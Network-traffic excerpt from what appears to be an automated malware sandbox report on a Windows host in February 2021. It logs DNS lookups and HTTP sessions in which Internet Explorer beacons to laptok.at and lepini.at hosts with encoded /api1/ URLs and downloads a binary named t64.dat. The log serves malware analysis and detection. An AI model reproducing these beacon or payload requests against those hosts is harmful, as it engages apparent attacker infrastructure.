                                                                                Feb 16, 2021 00:58:56.469316959 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.469320059 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469358921 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.469408035 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469470024 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469508886 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.469525099 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469569921 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469609022 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469650030 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.469655991 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469707966 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469739914 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.469758987 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469796896 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.469832897 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469852924 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469893932 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469930887 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.469944954 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.469990969 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470046043 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470091105 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.470120907 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470149040 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470182896 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.470205069 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470263004 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470303059 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.470329046 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470355034 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470395088 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.470407009 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470465899 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470501900 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.470525980 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470562935 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.470586061 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470639944 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470676899 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.470712900 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470745087 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.470769882 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470798016 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470840931 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470913887 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.470952034 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.470968962 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.471003056 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.471118927 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.516905069 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.516974926 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517018080 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517055988 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517096996 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517129898 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517148972 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517177105 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517216921 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517220974 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517263889 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517296076 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517333984 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517363071 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517456055 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517462969 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517488956 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517529011 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517564058 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517595053 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517627954 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517632008 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517683029 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517724991 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517761946 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517812014 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517812014 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517865896 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517906904 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.517916918 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517954111 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.517966032 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518014908 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518057108 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518062115 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.518110037 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518153906 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518156052 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.518209934 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518255949 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518263102 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.518316031 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518362045 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.518400908 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.518493891 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:56.815437078 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:56.815592051 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:57.371340036 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:57.371423006 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:58.427213907 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:58.427453995 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:59.626430035 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:59.672249079 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:59.672274113 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:58:59.672349930 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:59.857465029 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:59.861767054 CET4979880192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:58:59.907371998 CET804979834.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:05.510451078 CET4980080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:05.558578968 CET804980034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:05.558753014 CET4980080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:05.558873892 CET4980080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:05.647444010 CET804980034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:06.251410007 CET804980034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:06.251626015 CET4980080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:06.251652956 CET4980080192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:06.298836946 CET804980034.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:06.687948942 CET4980180192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:06.735898972 CET804980134.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:06.736171961 CET4980180192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:06.736301899 CET4980180192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:06.736310005 CET4980180192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:06.782016039 CET804980134.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:07.282991886 CET804980134.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:07.283123970 CET4980180192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:07.293183088 CET4980180192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:07.342428923 CET804980134.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:08.273911953 CET4980280192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:08.319516897 CET804980234.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:08.324184895 CET4980280192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:08.534192085 CET4980280192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:08.623342991 CET804980234.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:08.940006018 CET804980234.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:08.940227032 CET4980280192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:08.940260887 CET4980280192.168.2.434.65.144.159
                                                                                Feb 16, 2021 00:59:08.985836029 CET804980234.65.144.159192.168.2.4
                                                                                Feb 16, 2021 00:59:21.306014061 CET49764443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.306123018 CET49762443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.306181908 CET49761443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.306322098 CET49763443192.168.2.4151.101.1.44
                                                                                Feb 16, 2021 00:59:21.306462049 CET49759443192.168.2.4151.101.1.44

                                                                                UDP Packets


                                                                                ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Feb 16, 2021 00:58:10.168631077 CET | 192.168.2.4 | 8.8.8.8 | d003 | (Port unreachable) | Destination Unreachable

                                                                                DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 16, 2021 00:57:31.814762115 CET | 192.168.2.4 | 8.8.8.8 | 0x5b17 | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:34.188555002 CET | 192.168.2.4 | 8.8.8.8 | 0x4996 | Standard query (0) | web.vortex.data.msn.com | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:34.628803015 CET | 192.168.2.4 | 8.8.8.8 | 0x891 | Standard query (0) | geolocation.onetrust.com | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:34.713625908 CET | 192.168.2.4 | 8.8.8.8 | 0x1c4e | Standard query (0) | contextual.media.net | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:36.568550110 CET | 192.168.2.4 | 8.8.8.8 | 0x5c3e | Standard query (0) | lg3.media.net | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:37.263225079 CET | 192.168.2.4 | 8.8.8.8 | 0xec16 | Standard query (0) | hblg.media.net | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:37.863677979 CET | 192.168.2.4 | 8.8.8.8 | 0x5730 | Standard query (0) | cvision.media.net | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:38.229052067 CET | 192.168.2.4 | 8.8.8.8 | 0xc9a | Standard query (0) | srtb.msn.com | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:39.318974018 CET | 192.168.2.4 | 8.8.8.8 | 0xd5ee | Standard query (0) | img.img-taboola.com | A (IP address) | IN (0x0001)
Feb 16, 2021 00:58:08.847168922 CET | 192.168.2.4 | 8.8.8.8 | 0xaf9a | Standard query (0) | api10.laptok.at | A (IP address) | IN (0x0001)
Feb 16, 2021 00:58:09.856961966 CET | 192.168.2.4 | 8.8.8.8 | 0xaf9a | Standard query (0) | api10.laptok.at | A (IP address) | IN (0x0001)
Feb 16, 2021 00:58:13.779700994 CET | 192.168.2.4 | 8.8.8.8 | 0xa6f4 | Standard query (0) | api10.laptok.at | A (IP address) | IN (0x0001)
Feb 16, 2021 00:58:17.105812073 CET | 192.168.2.4 | 8.8.8.8 | 0x42fc | Standard query (0) | api10.laptok.at | A (IP address) | IN (0x0001)
Feb 16, 2021 00:58:55.906318903 CET | 192.168.2.4 | 8.8.8.8 | 0x965c | Standard query (0) | c56.lepini.at | A (IP address) | IN (0x0001)
Feb 16, 2021 00:59:03.718739986 CET | 192.168.2.4 | 8.8.8.8 | 0x7e54 | Standard query (0) | resolver1.opendns.com | A (IP address) | IN (0x0001)
Feb 16, 2021 00:59:05.444958925 CET | 192.168.2.4 | 8.8.8.8 | 0x73de | Standard query (0) | api3.lepini.at | A (IP address) | IN (0x0001)
Feb 16, 2021 00:59:06.626705885 CET | 192.168.2.4 | 8.8.8.8 | 0xf553 | Standard query (0) | api3.lepini.at | A (IP address) | IN (0x0001)
Feb 16, 2021 00:59:08.215668917 CET | 192.168.2.4 | 8.8.8.8 | 0x517 | Standard query (0) | api3.lepini.at | A (IP address) | IN (0x0001)

                                                                                DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 16, 2021 00:57:31.865664005 CET | 8.8.8.8 | 192.168.2.4 | 0x5b17 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net |  | CNAME (Canonical name) | IN (0x0001)
Feb 16, 2021 00:57:34.256162882 CET | 8.8.8.8 | 192.168.2.4 | 0x4996 | No error (0) | web.vortex.data.msn.com | web.vortex.data.microsoft.com |  | CNAME (Canonical name) | IN (0x0001)
Feb 16, 2021 00:57:34.677495003 CET | 8.8.8.8 | 192.168.2.4 | 0x891 | No error (0) | geolocation.onetrust.com |  | 104.20.184.68 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:34.677495003 CET | 8.8.8.8 | 192.168.2.4 | 0x891 | No error (0) | geolocation.onetrust.com |  | 104.20.185.68 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:34.785234928 CET | 8.8.8.8 | 192.168.2.4 | 0x1c4e | No error (0) | contextual.media.net |  | 184.30.24.22 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:36.635288954 CET | 8.8.8.8 | 192.168.2.4 | 0x5c3e | No error (0) | lg3.media.net |  | 184.30.24.22 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:37.338659048 CET | 8.8.8.8 | 192.168.2.4 | 0xec16 | No error (0) | hblg.media.net |  | 184.30.24.22 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:37.924860954 CET | 8.8.8.8 | 192.168.2.4 | 0x5730 | No error (0) | cvision.media.net | cvision.media.net.edgekey.net |  | CNAME (Canonical name) | IN (0x0001)
Feb 16, 2021 00:57:38.288559914 CET | 8.8.8.8 | 192.168.2.4 | 0xc9a | No error (0) | srtb.msn.com | www.msn.com |  | CNAME (Canonical name) | IN (0x0001)
Feb 16, 2021 00:57:38.288559914 CET | 8.8.8.8 | 192.168.2.4 | 0xc9a | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net |  | CNAME (Canonical name) | IN (0x0001)
Feb 16, 2021 00:57:39.378199100 CET | 8.8.8.8 | 192.168.2.4 | 0xd5ee | No error (0) | img.img-taboola.com | tls13.taboola.map.fastly.net |  | CNAME (Canonical name) | IN (0x0001)
Feb 16, 2021 00:57:39.378199100 CET | 8.8.8.8 | 192.168.2.4 | 0xd5ee | No error (0) | tls13.taboola.map.fastly.net |  | 151.101.1.44 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:39.378199100 CET | 8.8.8.8 | 192.168.2.4 | 0xd5ee | No error (0) | tls13.taboola.map.fastly.net |  | 151.101.65.44 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:39.378199100 CET | 8.8.8.8 | 192.168.2.4 | 0xd5ee | No error (0) | tls13.taboola.map.fastly.net |  | 151.101.129.44 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:57:39.378199100 CET | 8.8.8.8 | 192.168.2.4 | 0xd5ee | No error (0) | tls13.taboola.map.fastly.net |  | 151.101.193.44 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:58:10.156774998 CET | 8.8.8.8 | 192.168.2.4 | 0xaf9a | No error (0) | api10.laptok.at |  | 34.65.144.159 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:58:10.168512106 CET | 8.8.8.8 | 192.168.2.4 | 0xaf9a | No error (0) | api10.laptok.at |  | 34.65.144.159 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:58:13.839030027 CET | 8.8.8.8 | 192.168.2.4 | 0xa6f4 | No error (0) | api10.laptok.at |  | 34.65.144.159 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:58:17.165864944 CET | 8.8.8.8 | 192.168.2.4 | 0x42fc | No error (0) | api10.laptok.at |  | 34.65.144.159 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:58:56.196962118 CET | 8.8.8.8 | 192.168.2.4 | 0x965c | No error (0) | c56.lepini.at |  | 34.65.144.159 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:59:03.767468929 CET | 8.8.8.8 | 192.168.2.4 | 0x7e54 | No error (0) | resolver1.opendns.com |  | 208.67.222.222 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:59:05.504158974 CET | 8.8.8.8 | 192.168.2.4 | 0x73de | No error (0) | api3.lepini.at |  | 34.65.144.159 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:59:06.687158108 CET | 8.8.8.8 | 192.168.2.4 | 0xf553 | No error (0) | api3.lepini.at |  | 34.65.144.159 | A (IP address) | IN (0x0001)
Feb 16, 2021 00:59:08.273060083 CET | 8.8.8.8 | 192.168.2.4 | 0x517 | No error (0) | api3.lepini.at |  | 34.65.144.159 | A (IP address) | IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • api10.laptok.at
                                                                                • c56.lepini.at
                                                                                • api3.lepini.at

                                                                                HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49775 | 34.65.144.159 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Feb 16, 2021 00:58:10.224896908 CET | 3153 | OUT | GET /api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkO/Am1fQoOyYzGbM/xK7yrntx/Hruw1HZvAcfYl7dS_2F5g51/rLGjgSsh9h/OW8nevv3Dh4VYPuXW/03beET_2FA3a/YKD8HGeNgat/jK8A9eho17ABaL/cUew4H72hIfxngPdnFseX/f9MvJYHFQTCCYMoN/XdpbU1hBHNX722p/DPf7k1CgkBZqmPOtaO/MB_2B0Lh_/2FdHYj_2Bx0ZSPs6m_2F/GelX35xSpPMKNfn0Q3D/54O_2FBBcuPBTrZpvB9zhY/7AC9yYriaqcnPDRgK/E HTTP/1.1
                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                Accept-Language: en-US
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: api10.laptok.at
                                                                                Connection: Keep-Alive
Feb 16, 2021 00:58:10.695950031 CET | 3155 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:58:10 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                X-Content-Type-Options: nosniff
                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49776 | 34.65.144.159 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Feb 16, 2021 00:58:11.253958941 CET | 3368 | OUT | GET /favicon.ico HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Host: api10.laptok.at
                                                                                Connection: Keep-Alive
Feb 16, 2021 00:58:11.377232075 CET | 3368 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:58:11 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49780 | 34.65.144.159 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Feb 16, 2021 00:58:13.894741058 CET | 3484 | OUT | GET /api1/ACRDYIo3vDDkE8nBO7rZ_2F/RKqyjTnG2z/bw24fKr8FPY8iC_2F/NOd8pP1qrd_2/B0zRVNFer70/12v4aw2Bat1oWp/EdxqaQHccPmd48WBI_2Fh/ZsZf5oFs1F5WVpMV/Aql6isAZLQXMGYV/uCpbF51_2FaHU68PIY/HN1L8Jeq6/71Of32mfKV_2FEsbc40d/blSVHi4z_2F2u7ZVT2S/LNeMbeXi5H54yUd71Yke04/YvCLg_2BV_2FO/HHmC2v0g/tP9YiJq20QZR4sjpPzGs48R/leCqM3qCaD/cvMCdxcgqejP1dFql/2a73eaCZuJLy/90fQzPpEVBC/OzDkRB7t1Aba9y/CFI HTTP/1.1
                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                Accept-Language: en-US
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: api10.laptok.at
                                                                                Connection: Keep-Alive
Feb 16, 2021 00:58:14.372047901 CET | 3549 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:58:14 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                X-Content-Type-Options: nosniff
                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49781 | 34.65.144.159 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Feb 16, 2021 00:58:14.900562048 CET | 3842 | OUT | GET /favicon.ico HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Host: api10.laptok.at
                                                                                Connection: Keep-Alive
Feb 16, 2021 00:58:15.025079012 CET | 3843 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:58:14 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49788 | 34.65.144.159 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Feb 16, 2021 00:58:17.225936890 CET | 4069 | OUT | GET /api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNzdBvmlH/vt_2B9x1x6ck65MR/ZpG7Z5d4NVWsbef/IA3fJ5Djq3zGkBqE7x/LReOBCAcB/qC_2F1dmcLdFTOEEnZgz/STGZ2dxkKMV5RKreGCr/RFkW6kLd_2Bklvq9QHSZcn/We3rTC8YPIxkv/L14t5cJM/ZLd1Hb81ZBMybrjlIjy_2Fg/_2F_2FS_2F/TBW_2Bf883H2QksUF/tthcWoumhUqM/8KeCGS7jeEC/1wCg0gHPiLWtYc/_2Fsv97M6I2fbFhoAJh9s/q_2FhY0fUvPWozDY/zNJTP3X_2B7F8/ha HTTP/1.1
                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                Accept-Language: en-US
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: api10.laptok.at
                                                                                Connection: Keep-Alive
Feb 16, 2021 00:58:17.669728994 CET | 4247 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:58:17 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                X-Content-Type-Options: nosniff
                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49798 | 34.65.144.159 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Feb 16, 2021 00:58:56.246588945 CET | 8581 | OUT | GET /jvassets/xI/t64.dat HTTP/1.1
                                                                                Cache-Control: no-cache
                                                                                Connection: Keep-Alive
                                                                                Pragma: no-cache
                                                                                Host: c56.lepini.at
Feb 16, 2021 00:58:56.371509075 CET | 8582 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 15 Feb 2021 23:58:56 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 138820
                                                                                Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT
                                                                                Connection: close
                                                                                ETag: "5db6b84e-21e44"
                                                                                Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.4 | 49800 | 34.65.144.159 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Feb 16, 2021 00:59:05.558873892 CET | 8800 | OUT | GET /api1/_2F5TIxM/R_2B3lAdX7FSifvLwGRNf4T/Xn6jTZLuMx/wh5E4h_2FPyrBTqQP/YDN8egogNxbu/ymacPdIkir0/NKKNzqD2vuGYxD/EQ2iBv1vi_2FKgbC6jRvO/67ImFcDLm_2FOZDz/QiB35x1OBx9fyp0/LL2dXEqoTiSnjkl_2B/cqWZBDCtg/kw_2BqWxxyjtsXEtMuCO/OQivEAtVKK4aYWaKL3G/xgxPJ7qQNKlWaEOMoFWGiX/qJDWe3oU_2FIN/ksLvpLmR/pIAQEZhwMl9o8sI2Dx0z5d9/PBFpDZPttD/KT6P6hofH96qtO4zq/sMAC80l_2B/o HTTP/1.1
                                                                                Cache-Control: no-cache
                                                                                Connection: Keep-Alive
                                                                                Pragma: no-cache
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
